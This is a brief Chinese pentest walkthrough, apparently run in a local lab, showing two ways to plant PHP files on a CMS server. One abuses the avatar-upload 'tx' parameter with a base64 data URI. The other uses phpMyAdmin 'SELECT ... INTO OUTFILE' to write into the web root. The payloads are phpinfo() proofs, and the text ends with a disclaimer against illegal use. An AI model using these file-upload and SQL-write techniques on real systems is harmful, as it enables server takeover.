一、任意上传文件拿shell
1、注册账号
2、上传头像
3、上传任意文件,抓包分析
将tx后面的内容修改为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D
解密收的内容为:data:image/php;base64,<?php phpinfo();?>,也就是上传一个文件内容为<?php phpinfo();?>的php文件
4、虽然提示报错,但是我们访问上传后的地址: http://192.168.171.128/uploadfile/member/3/0x0.php ,文件已生效
二、sql命令拿shell
1、进入phpmyadmin页面
2、输入一下sql语句并执行,生成一aiyou.php文件,内容为<?php phpinfo();?>
select “<?php phpinfo();?>” into outfile “C:/phpStudy/PHPTutorial/WWW/aiyou.php”
3、访问该文件 http://192.168.171.128/aiyou.php
禁止非法,后果自负
